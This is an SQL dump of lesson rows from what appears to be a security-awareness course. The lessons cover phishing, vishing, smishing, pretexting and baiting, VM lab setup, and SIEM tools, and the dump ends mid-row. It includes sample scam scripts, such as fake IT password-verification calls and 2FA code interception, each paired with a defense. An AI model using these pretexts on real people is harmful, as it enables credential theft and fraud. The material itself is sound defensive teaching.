(553, 195, '## Investigation: Credential Harvesting\n\n**Goal**: Steal username/password.\n\n### Mechanism\n1.  **The Hook**: \"Your Office 365 password has expired. Click here to keep same password.\"\n2.  **The Line**: Link goes to `microsoft-login-secure.com` (Phishing Site).\n3.  **The Sinker**: Site looks 100% like Microsoft. User types creds. Site saves them and redirects user to real Microsoft.\n\n### Indicators\n*   **URL Analysis**: Look at the domain. Is it `microsoft.com`?\n*   **HTTPS**: Phishing sites DO use HTTPS (Green lock). Keys are free from Let\'s Encrypt. Do not trust the lock.\n*   **Brand**: Use of official logos.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(554, 196, '## Phishing Final Assessment\nCheck your knowledge on SPF, DMARC, and Analysis techniques.', 'markdown', 15, '2025-12-26 22:17:47', '2025-12-29 14:04:25'),
(555, 201, '## Psychology of Persuasion\n\nSocial Engineering hacks the *human*, not the machine.\nRobert Cialdini defined 6 principles.\n\n### 1. Authority\n\"I am the VP of IT. Do what I say.\"\n*   People obey authority figures automatically.\n\n### 2. Urgency / Scarcity\n\"Your account will be deleted in 1 hour.\"\n*   Panic shuts down critical thinking.\n\n### 3. Reciprocity\n\"I helped you with that ticket last week. Can you help me now?\"\n*   Social debt.\n\n### 4. Liking\n\"Wow, you like the Yankees too?\"\n*   We trust people we like.\n\n### 5. Social Proof\n\"Everyone else in the department has already done the survey.\"\n*   Herd mentality.\n\n### 6. Commitment\n\"Can you just answer one small question?\" -> \"Okay, verify your password.\"\n*   Foot-in-the-door technique.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(556, 202, '## Pretexting and Impersonation\n\nCreating a scenario (The Pretext).\n\n### The IT Support Scam\n*   **Role**: New IT Helpdesk Guy.\n*   **Pretext**: \"Hey, we are migrating servers and your account is desynchronized. I need to verify your password.\"\n*   **Why it works**: Employees are trained to help IT.\n\n### Defense\n**Authentication**.\n\"Can you verify your employee ID?\"\n\"I will call you back on the internal extension listed in the directory.\" (The attacker hates this).', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(557, 203, '## Vishing (Voice Phishing)\n\nHacking over the phone.\n\n### The Deepfake Era\n*   AI can now clone voices with 3 seconds of audio.\n*   \"Hi Mom, I\'m in jail, send money.\" (Grandparent Scam).\n*   \"Hi Process Team, this is the CEO, approve the transaction.\"\n\n### Techniques\n1.  **Caller ID Spoofing**: Making the phone show \"Internal IT Helpdesk\".\n2.  **Background Noise**: Playing office sounds (typing, printers) to verify the lie.\n\n### Defense\n*   **Callback Policy**: \"I need to verify. I will hang up and call you back at your internal extension listed in the directory.\"\n    *   If they resist (\"No, I am on my cell!\"), it is a scam.\n*   **Challenge-Response**: \"What is the daily code word?\"', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(558, 204, '## Smishing (SMS Phishing)\n\nTexts are trusted more than emails.\n\n### Delivery Package Scam\n\"USPS: We missed your delivery. Click here to reschedule: `usps-track-package.com`.\"\n*   **Payload**: Credit Card theft (small fee to reschedule) or Android Malware download.\n\n### 2FA Intercept\n\"Your bank account is compromised. Please read me the code sent to your phone to verify identity.\"\n*   **Reality**: The attacker has your password. The code is the 2FA login token. If you read it, they are in.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(559, 205, '## Physical: Tailgating & Dumpster Diving\n\n### Tailgating (Piggybacking)\n*   **Concept**: Walking in behind someone who has badged in.\n*   **Exploit**: \"Hold the door!\" (Kindness).\n*   **Defense**: \"One Badge, One Entry\" policy. Even if it is rude, shut the door.\n\n### Dumpster Diving\n*   **Concept**: Looking through trash.\n*   **Target**: Org Charts, Sticky notes with passwords, Bank statements, Vendor invoices.\n*   **Defense**:\n    *   **Shred Everything**.\n    *   Secure Trash Bins (Locked).\n\n### USB Drops (Baiting)\n*   Dropping a USB key labeled \"Payroll 2025\" in the parking lot.\n*   Curiosity kills the cat (and the network).\n*   **Defense**: Disable USB Mass Storage via Group Policy.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 16:32:38'),
(560, 206, '## Baiting and Quid Pro Quo\n\n### Baiting (The USB Drop)\nLeaving a USB drive labeled \"Payroll 2024\" or \"Layoff Plan\" in the parking lot.\n*   **Impact**: Curiosity > Security. Victim plugs it in. Malware auto-runs.\n*   **Defense**: Glue USB ports shut (Extreme) or Disable Mass Storage via GPO.\n\n### Quid Pro Quo\n\"Something for Something\".\n*   \"Take this survey and win a free Chocolate Bar.\" (Password is one of the survey questions).', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41');
INSERT INTO `lesson_content` (`id`, `task_id`, `content`, `content_type`, `reading_time_minutes`, `created_at`, `updated_at`) VALUES
(561, 207, '## Social Engineering Final Quiz\nTest your ability to spot the lie.', 'markdown', 15, '2025-12-26 22:28:54', '2025-12-29 14:06:41'),
(562, 211, '## Introduction to Virtualization\n\n**Virtualization** is the magic that runs the cloud.\nIt allows one physical computer (Host) to run multiple fake computers (Guests).\n\n### Physical vs Virtual\n*   **Physical**: One OS controls the hardware directly. If the OS crashes, the machine stops.\n*   **Virtual**: A **Hypervisor** sits between the hardware and the OS.\n    *   It slices the RAM (16GB -> 4GB for VM1, 4GB for VM2).\n    *   It slices the CPU time.\n\n### Why do we use it in Security?\n1.  **Isolation**: If you run malware in a VM, it cannot infect your real laptop (usually).\n2.  **Snapshots**: You can save the state. If you delete `System32` by accident, just click \"Revert\".\n3.  **Efficiency**: You can run a Windows DC, a Linux Web Server, and a Kali Attacker all on one laptop.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(563, 212, '## Hypervisors: Type 1 vs Type 2\n\nThe software that runs VMs.\n\n### Type 1 (Bare Metal)\n*   **Installs**: Directly on the hardware. NO Windows/MacOS underneath.\n*   **Performance**: Extremely fast.\n*   **Usage**: Enterprise/Servers.\n*   **Examples**: VMware ESXi, Microsoft Hyper-V (Server), Proxmox.\n\n### Type 2 (Hosted)\n*   **Installs**: Like an app on your existing OS.\n*   **Performance**: Slower (overhead of the Host OS).\n*   **Usage**: Laptops/Desktops.\n*   **Examples**: VMware Workstation, Oracle VirtualBox.\n*   **Student Lab**: You will use Type 2 (VirtualBox) because you don\'t want to wipe your laptop.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(564, 213, '## Setting Up VirtualBox (Free)\n\nOracle VirtualBox is the most popular free hypervisor.\n\n### Installation Steps\n1.  Download from virtualbox.org.\n2.  Install the **Extension Pack** (Critical! This gives you USB support and better drivers).\n3.  Enable **Virtualization Technology (VT-x / AMD-V)** in your BIOS.\n    *   *Error*: If you get \"Verr_VMX_No_VMX\", restart computer, go to BIOS, enable VT-x.\n\n### Common Settings\n*   **RAM**: Give it 2GB-4GB (Don\'t starve your host).\n*   **CPU**: Give it 2 Cores.\n*   **Video Memory**: Max it out (128MB) for smooth UI.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(565, 214, '## VMware Workstation (Pro/Player)\n\nThe industry standard for desktop virtualization.\n\n### Benefits over VirtualBox\n*   **Better 3D Acceleration**: Smoother UI.\n*   **Unity Mode**: Run Linux apps directly on your Windows desktop window.\n*   **Compatibility**: Most enterprise appliances (OVF) are built for VMware.\n*   **Networking**: More stable NAT engine.\n\n### Free vs Pro\n*   **Player**: Free for personal use. Can run VMs. Cannot creating complicated networks.\n*   **Pro**: Paid. Full snapshot trees, Network Editor (Virtual Network Editor is powerful).', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 14:04:25'),
(566, 215, '## Creating Your First VM (Kali Linux)\n\n**Kali Linux** is the standard OS for penetration testing.\n\n### The Easy Way (OVA)\n1.  Download the **Kali Linux VirtualBox Image** (not the ISO installer).\n2.  It comes as a `.ova` file.\n3.  Double click the file. VirtualBox imports it instantly with all settings correct.\n4.  User/Pass: `kali` / `kali`.\n\n### The Hard Way (ISO)\n1.  Create New VM \"Linux / Debian 64-bit\".\n2.  Mount the ISO file as a CD-ROM.\n3.  Boot and run the installer manually.\n*   *Why do this?* If you want a custom, lightweight install.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(567, 216, '## Network Modes: NAT, Bridged, Host-Only\n\nThis confuses everyone.\n\n### 1. NAT (Default)\n*   **Analogy**: Your VM is behind a router (your Host).\n*   **Access**:\n    *   VM -> Internet: YES.\n    *   Internet -> VM: NO.\n    *   Host -> VM: NO (Tricky, requires port forwarding).\n*   *Use*: Just browsing the web.\n\n### 2. Bridged\n*   **Analogy**: Your VM plugs a cable directly into your home Wi-Fi router.\n*   **Result**: It gets its own IP on your LAN (e.g., `192.168.1.50`).\n*   **Access**: Everyone can talk to everyone.\n*   *Use*: If you want to SSH into it from another laptop.\n\n### 3. Host-Only\n*   **Analogy**: A private cable between Host and VM only. No Internet.\n*   **Access**: Extremely secure.\n*   *Use*: Malware Analysis (So the malware can\'t phone home).', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(568, 217, '## Snapshots & Clones (The Safety Net)\n\n### Snapshots\n*   A \"Save Game\" point.\n*   **Workflow**:\n    1.  Install Windows.\n    2.  Take Snapshot \"Fresh Install\".\n    3.  Run Ransomware. (PC destroyed).\n    4.  Revert to \"Fresh Install\". (PC fixed in 10 seconds).\n*   *Warning*: Snapshots consume disk space over time.\n\n### Clones\n*   **Full Clone**: A complete copy (takes space). Independent.\n*   **Linked Clone**: A shortcut referencing the parent. Fast, saves space, but if you delete the parent, the clone breaks.', 'markdown', 10, '2025-12-26 22:32:26', '2025-12-29 16:32:49'),
(569, 221, '## The Central Nervous System of Security\n\n**Security Information and Event Management (SIEM)** is not just a tool; it is the beating heart of a modern Security Operations Center (SOC). To understand SIEM, we must first understand the problem it solves: **Data Overload and Disconnected Visibility.**\n\n### The Pre-SIEM Nightmare\nImagine you are a security administrator in the year 2005. You are responsible for:\n*   **50 Windows Servers** (generating Windows Event Logs)\n*   **20 Linux Web Servers** (generating Syslog/Apache logs)\n*   **2 Firewalls** (generating proprietary traffic logs)\n*   **1 Antivirus Server** (generating alert logs)\n\nOne day, the CEO\'s laptop is infected with malware. To investigate, you must:\n1.  Remote Desktop into the Antivirus server to see the alert time.\n2.  SSH into the proxy server and `grep` through gigabytes of logs to see what URL the CEO visited.\n3.  Login to the Firewall web interface to see if any strange connections were made out to the internet.\n4.  RDP into the Domain Controller to see if the user account was locked out.\n\nThis process is manual, slow, and impossible to scale. A single firewall can generate **10GB of logs per day**. No human can read that. Furthermore, the \"signal\" of an attack is often split across these devices.\n\n### Enter the SIEM\nA SIEM solves this by unifying your view. It performs three critical functions, often called the \"Trinity of SIEM\":\n\n#### 1. Aggregation (Collection)\nThe SIEM reaches out and grabs logs from *everything*. It acts as a central warehouse.\n*   **Network Devices**: Switches, Routers, Firewalls send Syslog.\n*   **Endpoints**: Windows and Linux servers send OS logs.\n*   **Applications**: Web servers, databases, and custom apps send application logs.\n*   **Security Tools**: IDPS, Antivirus, and DLP solutions send alerts.\n\n#### 2. Normalization (Translation)\nThis is the \"Universal Translator\" function.\n*   **Problem**: A Windows log says `EventID: 4625` (Failed Login). A Linux log says `Failed password for user root`. A Cisco router says `%SEC-6-IPACCESSLOGP`.\n*   **Solution**: The SIEM parses these raw logs and maps them to standard fields.\n    *   `src_ip`: 192.168.1.5\n    *   `user`: admin\n    *   `action`: failure\n    *   `timestamp`: 2023-10-27T10:00:00Z\nNow, you can search for `action=failure` and see results from Windows, Linux, and Cisco all in one view.\n\n#### 3. Correlation (Intelligence)\nThis is the \"Brain\". It connects the dots between seemingly unrelated events.\n*   **Event A (Firewall)**: Inbound connection from 1.2.3.4 on Port 445 (Blocked).\n*   **Event B (VPN)**: Successful login from 1.2.3.4 (Allowed).\n*   **Event C (DC)**: User \"HelpDesk\" added to \"Domain Admins\" group.\n\nIndividually, Event B might look normal. But **Event A + Event B + Event C** appearing within 5 minutes triggers a high-severity **Correlation Rule**: \"External Attack with Privilege Escalation\".\n\n### Why is SIEM Mandatory?\n1.  **Compliance**: Regulations like **PCI-DSS**, **HIPAA**, **SOX**, and **GDPR** explicitly require centralized log management and retention. You cannot pass an audit without it.\n2.  **Forensics**: When a breach is discovered (often months after it happened), the SIEM is the *only* place where you can find historical execution records to trace the attacker\'s path.\n3.  **Real-Time Detection**: It is the only way to detect complex, multi-stage attacks (like APTs) that move laterally across your network.\n\n### The Modern Evolution: SIEM + SOAR + UEBA\nTraditional SIEM had a flaw: it generated too many alerts. Modern SIEMs are evolving into **Security Analytics Platforms**:\n*   **UEBA (User and Entity Behavior Analytics)**: Instead of static rules (\"Alert if > 5 failed logins\"), it uses Machine Learning (\"Alert because Bob never logs in at 3 AM from North Korea\").\n*   **SOAR (Security Orchestration, Automation, and Response)**: Automated actions. If the SIEM sees a virus, the SOAR automatically isolates the computer from the network.\n\n### Summary\nIf the SOC is a castle, the Firewalls are the walls, the EDR is the guards, and the **SIEM is the Watchtower** where the commander sees the entire battlefield.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(570, 222, '## Feeding the Beast: Log Sources & Ingestion\n\nA SIEM is only as good as the data you feed it. As the saying goes: **\"Garbage In, Garbage Out.\"** (Or worse: \"Nothing In, Blindness Out\").\n\n### Types of Log Data\nNot all logs are created equal. A SOC Analyst deals with three primary categories:\n\n#### 1. Event Logs (Structured)\nThese are logs generated by the Operating System. They are highly structured and rich in metadata.\n*   **Windows Event Logs**: The gold standard for endpoint visibility. Stored in binary `.evtx` format.\n    *   *Security*: Logins (`4624`), Process Creation (`4688`), Account Management.\n    *   *System*: Service failures, startup/shutdown.\n    *   *Application*: Errors from SQL Server, IIS, Chrome.\n*   **Linux Syslog**: The standard for Unix-based systems. Usually text-based but follows a facility/severity structure. `/var/log/auth.log` (authentication), `/var/log/syslog` (general).\n\n#### 2. Network Logs (Traffic)\nThese show the \"flow\" of data.\n*   **Firewall Logs**: Allow/Deny decisions. Crucial for perimeter defense.\n*   **NetFlow/IPFIX**: Metadata about traffic (Who, What, Where, When, How much) without the actual packet payload. \"Phone bill\" style records.\n*   **Proxy/DNS Logs**: Provide Layer 7 visibility. URLs visited (`evil.com`), DNS queries made.\n\n#### 3. Security Alerts (Context)\n*   Antivirus detections, IDS/IPS signatures (`ET TROJAN...`), DLP violations.\n\n### Ingestion Methods: Push vs. Pull\n\n#### The PUSH Method (Agents/Forwarders)\nThis is the most common and robust method for servers and endpoints. A small software agent is installed on the device.\n*   **How it works**: The agent watches log files/channels in real-time. When a new line is written, it immediately encrypts and sends it to the SIEM.\n*   **Examples**:\n    *   **Splunk Universal Forwarder (UF)**: Lightweight, reliable.\n    *   **Elastic Winlogbeat**: Sends Windows logs to Elasticsearch.\n    *   **Wazuh Agent**: Performs log collection + FIM + Config assessment.\n*   **Pros**: Real-time, encrypted, can buffer logs if the network goes down (caching).\n*   **Cons**: requires installing software on every endpoint (management overhead).\n\n#### The PULL Method (Agentless)\nUsed for devices where you cannot install software (Routers, Switches, Printers, Appliances).\n*   **WMI (Windows Management Instrumentation)**: The SIEM remotely queries the Windows server to ask for logs. *High overhead, rarely used for logs now.*\n*   **Log Collectors/Concentrators**: A dedicated server sits in the middle. Network devices verify syslog to the Collector. The Collector forwards to the SIEM.\n*   **API Fetching**: Modern Cloud method. The SIEM runs a script every 5 minutes to fetch logs from AWS CloudTrail, Office 365, or Okta APIs.\n\n### The Challenges of Ingestion\n\n#### 1. Time Synchronization (NTP)\nIf your Firewall thinks it is 2:00 PM and your Web Server thinks it is 1:00 PM, correlation is impossible. **NTP (Network Time Protocol)** is critical. All devices must sync to a central, reliable time source.\n\n#### 2. EPS (Events Per Second) & Licensing\nSIEMs are often expensive. Licensing is frequently based on:\n*   **Volume**: GBs of logs ingested per day.\n*   **EPS**: Average events per second.\nA noisy firewall in \"Debug\" mode can bankrupt a SOC by generating millions of useless events. Analysts must tune \"logging levels\" to capture *security-relevant* info without the noise.\n\n#### 3. Bandwidth\nSending full packet captures or debug logs from a satellite office over a T1 line will crash the network. Compression and filtering at the source (Agent) are vital.\n\n### Analyst Tip\nWhen investigating an incident, always ask: **\"What is NOT logging?\"** Attackers frequently disable logging (clearing Event Logs) or stop the Splunk Forwarder service as their first move. A \"Gap in Logs\" is often the biggest indicator of compromise.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(571, 223, '## Making Sense of Chaos: Normalization & Parsing\n\nImagine trying to read a book where every sentence is written in a different language. That is what raw logs look like to a computer.\n\n**Raw Log Example 1 (Cisco ASA Firewall):**\n`Oct 27 10:00:01 firewall-01 %ASA-6-302013: Built inbound TCP connection 1234 for outside:192.168.1.10/4444 (192.168.1.10/4444) to dmz:10.0.0.5/80 (10.0.0.5/80)`\n\n**Raw Log Example 2 (Apache Web Server):**\n`192.168.1.10 - - [27/Oct/2023:10:00:01 +0000] \"GET /index.html HTTP/1.1\" 200 2326`\n\n**Raw Log Example 3 (Windows Event 4624):**\n`Logon Type: 3, Source Network Address: 192.168.1.10, Account Name: Guest`\n\nA human can look at these and deduce that `192.168.1.10` is the \"Source IP\" in all three cases. But a computer cannot. If you search for `src_ip=192.168.1.10`, the computer won\'t find anything unless the logs are **Parsed** and **Normalized**.\n\n### The Parsing Process\nParsing is the act of breaking a raw text string into structured fields using logic (often Regular Expressions or \"Regex\").\n\n**Parsing the Apache Log:**\n*   Raw: `192.168.1.10 - - ...`\n*   Regex Rule: `^(S+) S+ S+ [([w:/]+s[+-]d{4})] \"(S+)s?(S+)?s?(S+)?\" (d{3}|-) (d+|-)`\n*   **Extracted Fields**:\n    *   client_ip: `192.168.1.10`\n    *   timestamp: `27/Oct/2023...`\n    *   method: `GET`\n    *   url: `/index.html`\n    *   status_code: `200`\n\nNow the SIEM understands the data.\n\n### Normalization: The Rosetta Stone\nParsing extracts the data, but **Normalization** standardizes the *names* of the fields.\n*   Vendor A calls it: `source_address`\n*   Vendor B calls it: `src_ip`\n*   Vendor C calls it: `ClientIP`\n*   Vendor D calls it: `c_ip`\n\nIf you are hunting for an IP, you don\'t want to run 4 different queries (`source_address=X OR src_ip=X OR...`).\nNormalization maps ALL of these to a single **Common Information Model (CIM)** field, usually `src_ip` or `source.ip`.\n\n### Why This Matters for Analysts\n1.  **Field Extraction Errors**: Sometimes parsing fails. If a developer changes the log format of an app, the SIEM might stop extracting the username. You will see the raw log, but searches for `user=\"baris\"` will return 0 results. This is a common troubleshooting task for analysts.\n2.  **Performance**: Searching based on indexed fields (`src_ip=1.2.3.4`) is milliseconds fast. Searching raw text (`\"1.2.3.4\"`) is essentially doing `Ctrl+F` on terabytes of text—it is agonizingly slow.\n3.  **Visualizations**: You cannot build a chart of \"Top 10 Bad IPs\" if the IP address isn\'t extracted into a field.\n\n### Common Schemas\n*   **Splunk CIM (Common Information Model)**: The standard for Splunk.\n*   **ECS (Elastic Common Schema)**: The standard for ELK/Elastic.\n*   **OCSF (Open Cybersecurity Schema Framework)**: An emerging open standard backed by AWS, Splunk, and IBM to unify log formats across the industry.\n\n### Scenario\nAn attacker uses a custom tool that generates logs in a format your SIEM hasn\'t seen before.\n*   **Bad Analyst**: Ignores it because it doesn\'t show up in dashboards.\n*   **Good Analyst**: Notices the raw logs, writes a custom Regex parser to extract the `Command_Line` field, and creates a new alert for it.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(572, 224, '## The Magic of Correlation: Finding the Needle in the Stack\n\nCorrelation is the brain of the SIEM. It is the logic engine that evaluates millions of individual events to identify patterns that indicate a security incident.\n\nWithout correlation, you just have a massive library of boring journals. Correlation is the detective reading all those journals to solve the crime.\n\n### The Logic of Correlation rules\nA correlation rule generally follows this Boolean logic structure:\n**IF** (Condition A) **AND** (Condition B) **HAPPENS WITHIN** (Time Window T) **THEN** (Trigger Alert).\n\n#### Example 1: Brute Force Detection\n*   **Raw Event**: Windows Event 4625 (Failed Login).\n*   **Problem**: Users mistype passwords all the time. One event is noise.\n*   **Correlation Rule**:\n    *   `event_id=4625` (Failed Login)\n    *   `count > 10`\n    *   `distinct_destination_user < 2` (Standard Brute force) OR `distinct_destination_user > 10` (Password Spraying)\n    *   `time_window = 5 minutes`\n*   **Meaning**: If the same IP fails to login 10 times in 5 minutes, ALERT.\n\n#### Example 2: The \"Impossible Travel\"\n*   **Event A**: User \"Alice\" logs in from New York (IP 1.2.3.4) at 10:00 AM.\n*   **Event B**: User \"Alice\" logs in from London (IP 5.6.7.8) at 10:15 AM.\n*   **Logic**: Distance between NY and London is 3,400 miles. It is impossible to travel that fast.\n*   **Rule**: IF (Login A success) AND (Login B success) AND (GeoIP distance > 500 miles) AND (Time difference < Flight time) -> ALERT.\n\n#### Example 3: Behavioral Chain (The Kill Chain)\n*   **Step 1**: Firewall detects Port Scan from IP X.\n*   **Step 2**: IDS detects SQL Injection attempt from IP X.\n*   **Step 3**: Web Server records 200 OK (Success) for a large file download to IP X.\n*   **Correlation**: Trigger \"Critical Compromise\" alert. A single IP scanned, exploited, and stole data.\n\n### Tuning: The Analyst\'s Nightmare\nCorrelation rules are prone to two deadly sins:\n\n#### 1. False Positives (The Boy Who Cried Wolf)\nThe rule alerts, but it\'s benign activity.\n*   *Alert*: \"Brute Force Detected!\"\n*   *Reality*: A script running on a server had an expired password and tried to retry connection 50 times in a second.\n*   *Consequence*: Alert Fatigue. Analysts stop paying attention to alerts if 90% are fake.\n\n#### 2. False Negatives (The Silent Killer)\nThe attack happens, but the rule doesn\'t trigger.\n*   *Attack*: Low-and-slow brute force. The attacker tries 1 password every hour.\n*   *Rule Limitation*: The rule was set to \"10 attempts in 5 minutes\". It missed the attack completely.\n*   *Consequence*: Breach.\n\n### Dynamic vs. Static Correlation\n*   **Static**: Rules we explicitly write (`count > 10`). Good for known threats.\n*   **Dynamic (Heuristic/Behavioral)**: The system learns what is \"normal\".\n    *   \"Alice usually downloads 50MB of data a day. Today she downloaded 5GB. ALERT.\"\n    *   This catches \"unknown unknowns\" or zero-days that don\'t match a signature.\n\n### The Role of Context\nCorrelation gets smarter with context.\n*   *Event*: \"Attack from External IP detected against Server A.\"\n*   *Context*: \"Server A is a test server with no sensitive data.\" -> **Low Severity**.\n*   *Context*: \"Server A is the CEO\'s laptop.\" -> **High Severity**.\n*   *Context*: \"Vulnerability Scanner says Server A is patched against this attack.\" -> **False Positive (mostly)**.\n\nA modern SIEM integrates with Asset Management and Vulnerability Scanners to enrich alerts with this context automatically.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(573, 225, '## Market Leaders: Splunk vs. Microsoft Sentinel\n\nIn the SIEM world, there are many players, but two dominate the enterprise space in 2024: **Splunk** and **Microsoft Sentinel**. As an analyst, you will likely work with one of these.\n\n### Splunk: The Heavyweight Champion\n\n**Splunk** is the \"Google for Data\". It started as a log search tool and evolved into a massive Security analytics platform.\n\n#### Key Features\n*   **SPL (Splunk Processing Language)**: A powerful, pipe-based query language (similar to Unix piping).\n    *   `index=firewall src_ip=10.0.0.1 | stats count by dest_port | sort - count`\n    *   Mastering SPL is a resume superpower.\n*   **Schema on Read**: Splunk doesn\'t need to understand the data structure *when it indexes it*. You can define fields later during the search. This is incredibly flexible.\n*   **Ecosystem**: Thousands of \"Apps\" and \"Add-ons\" for every vendor imaginable.\n\n#### Pros & Cons\n*   [+] **Mature**: Extensive documentation, community, and feature set.\n*   [+] **Flexible**: Can handle any type of data, not just security (DevOps, Business Analytics).\n*   [-] **Cost**: Historically very expensive (often charged by GB ingested).\n*   [-] **Complexity**: Requires dedicated engineers to manage the infrastructure (Indexers, Search Heads, Forwarders).\n\n### Microsoft Sentinel: The Cloud Native Challenger\n\n**Microsoft Sentinel** (formerly Azure Sentinel) is a cloud-native SIEM + SOAR solution built directly into Azure.\n\n#### Key Features\n*   **KQL (Kusto Query Language)**: The query language used by Sentinel. It is extremely fast, especially on large datasets.\n    *   `FirewallLogs | where SourceIP == \"10.0.0.1\" | summarize count() by DestinationPort | order by count_ desc`\n*   **Cloud Native**: No servers to manage. You don\'t patch Sentinel; you just enable it. It scales elastically.\n*   **Microsoft Integration**: Ingesting logs from Office 365, Azure AD (Entra ID), and Defender for Endpoint is often \"one-click\" and sometimes free.\n\n#### Pros & Cons\n*   [+] **Ease of Use**: Setup takes minutes, not months.\n*   [+] **Integration**: Unbeatable if your company is a \"Microsoft Shop\" (uses O365, Azure, Windows).\n*   [+] **Cost Model**: Pay-as-you-go.\n*   [-] **Cloud Locked**: While it *can* ingest AWS/Google logs, it works best in Azure.\n*   [-] **Younger**: Less community content and mature 3rd-party integrations compared to Splunk.\n\n### Other Notable Players\n*   **Elastic Security (ELK)**: The open-source giant. Highly customizable, free versions available, favored by engineering-heavy teams.\n*   **QRadar (IBM)**: A legacy enterprise player. Very strong on flow analytics and strict correlation rules.\n*   **Exabeam/Securonix**: Leaders in the UEBA (User Behavior Analytics) space, often used alongside other log managers.\n\n### Which one should you learn?\n*   Learn the **concepts** (Aggregation, Normalization, Correlation), not just the tool. The logic \"Find failed logins\" is the same in SPL and KQL.\n*   However, knowing **SPL** is currently the most requested skill in job descriptions, while **KQL** is the fastest growing.\n\n### Comparison Summary\n| Feature | Splunk | Microsoft Sentinel |\n| :--- | :--- | :--- |\n| **Deployment** | On-Prem, Cloud, or Hybrid | Cloud Only (SaaS) |\n| **Query Language** | SPL | KQL |\n| **Cost Model** | Volume/Workload pricing | Pay-as-you-go (Data/Compute) |\n| **Best For** | Complex, multi-cloud, hybrid enteprises | Azure/Microsoft-centric organizations |', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(574, 226, '## The Open Source Rebel: The ELK Stack (Elastic Stack)\n\nNot every company has the budget for Splunk or Sentinel. Enter the **ELK Stack**, the world\'s most popular open-source log management platform.\n\nELK stands for **E**lasticsearch, **L**ogstash, and **K**ibana. (Though now it includes **B**eats, so sometimes it\'s called the *Elastic Stack*).\n\n### The Components\n\n#### 1. Beats (The Shippers)\nLightweight data shippers that you install on your servers (Agents).\n*   **Filebeat**: Tails log files. Use this for Apache, Nginx, or custom app logs.\n*   **Winlogbeat**: Ships Windows Event Logs.\n*   **Packetbeat**: Sniffs network traffic (like Wireshark) and sends metadata.\n*   **Auditbeat**: Linux audit framework data (File Integrity Monitoring).\n*   *Role*: \"Go get the data and push it.\"\n\n#### 2. Logstash (The Plumber)\nThe heavy-duty processing pipeline. Logstash receives data from Beats (or Syslog), parses it, filters it, and transforms it.\n*   **Input**: Receive data on TCP 5044.\n*   **Filter**: This is where the magic happens.\n    *   *Grok*: A plugin to parse unstructured text into fields using Regex comparisons.\n    *   *GeoIP*: Adds Latitude/Longitude based on IP address.\n    *   *Drop*: Discard noise (e.g., \"Don\'t store debug logs\").\n*   **Output**: Send to Elasticsearch.\n*   *Role*: \"Clean, format, and enrich the data.\"\n\n#### 3. Elasticsearch (The Brain / Database)\nA distributed, RESTful search and analytics engine. It is a NoSQL database that stores data in JSON format.\n*   It is built for **speed**. You can search through billions of documents in milliseconds.\n*   It uses an \"Inverted Index\" (like the index at the back of a textbook). It doesn\'t scan every row; it looks up the word \"Error\" and instantly knows which rows contain it.\n*   *Role*: \"Store the data and find it fast.\"\n\n#### 4. Kibana (The Face)\nThe visualization dashboard.\n*   This is where the Analyst lives. You query Elasticsearch and visualize the results.\n*   Create pie charts, line graphs, maps, and data tables.\n*   **Canvas**: A feature to create pixel-perfect infographic presentations for management.\n\n### Elastic Security\nIn recent years, Elastic has added a dedicated \"Security\" app on top of ELK.\n*   **Detection Engine**: Runs automated rules (like Splunk correlation matches).\n*   **Prebuilt Rules**: Elastic provides hundreds of open detection rules mapped to MITRE ATT&CK.\n*   **Endpoint Security**: Elastic Agent can now prevent malware, not just log it.\n\n### Why use ELK?\n1.  **Cost**: The core is open source (Free). You pay for hardware/cloud hosting, but no licensing fees for data volume.\n2.  **Flexibility**: You have total control over every configuration file. You can build exactly what you need.\n3.  **Community**: Massive community support.\n\n### The Trade-off\nELK is \"Free as in Puppies,\" not \"Free as in Beer.\"\n*   Managing an Elasticsearch cluster is **hard**.\n*   Sharding, replication, heap memory management, and upgrades require specialized DevOps skills.\n*   If your cluster crashes during an attack, you are blind, and there is no 1-800 number to call (unless you pay for Enterprise support).\n\n### Analyst Workflow in Kibana\n1.  **Discover Tab**: Review raw logs. Filter by `event.category: \"authentication\"`.\n2.  **Visualize**: Create a \"Vertical Bar\" chart of `user.name` where `event.outcome: \"failure\"`.\n3.  **Dashboard**: Pin that chart to your \"Morning Coffee\" dashboard to spot anomalies instantly.', 'markdown', 15, '2025-12-26 22:35:58', '2025-12-29 15:04:12'),
(575, 227, '## Wazuh: The Modern Open SIEM\n\nWhile ELK is a general-purpose data platform that *can* be used for security, **Wazuh** is a platform built *specifically* for security from day one. It often sits on top of the ELK stack (using Elasticsearch for storage) but replaces the heavy lifting of Logstash/Beats with its own specialized agents.\n\n### Architecture\n\n#### 1. The Wazuh Agent\nInstalled on endpoints (Windows, Linux, macOS). It is far more powerful than a simple log shipper.\n*   **Log Collection**: Reads system logs and application logs.\n*   **FIM (File Integrity Monitoring)**: It takes cryptographic hashes (MD5/SHA256) of critical files. If a hacker modifies `/etc/passwd` or `system32.dll`, Wazuh alerts immediately.\n*   **Rootkit Detection**: Scans for hidden processes, hidden ports, and anomalous system calls.\n*   **Vulnerability Detection**: Compares installed software versions against the CVE database. \"Hey, you have Chrome version 80 installed; it has 5 critical vulnerabilities.\"\n*   **Active Response**: Can execute scripts to block an attack. (e.g., \"If source IP logs in 10 times fail -> Add IP to Firewall Drop rule\").\n\n#### 2. The Wazuh Server\n*   Receives data from agents.\n*   **Decoders**: Parses raw logs into fields.\n*   **Rules Engine**: The 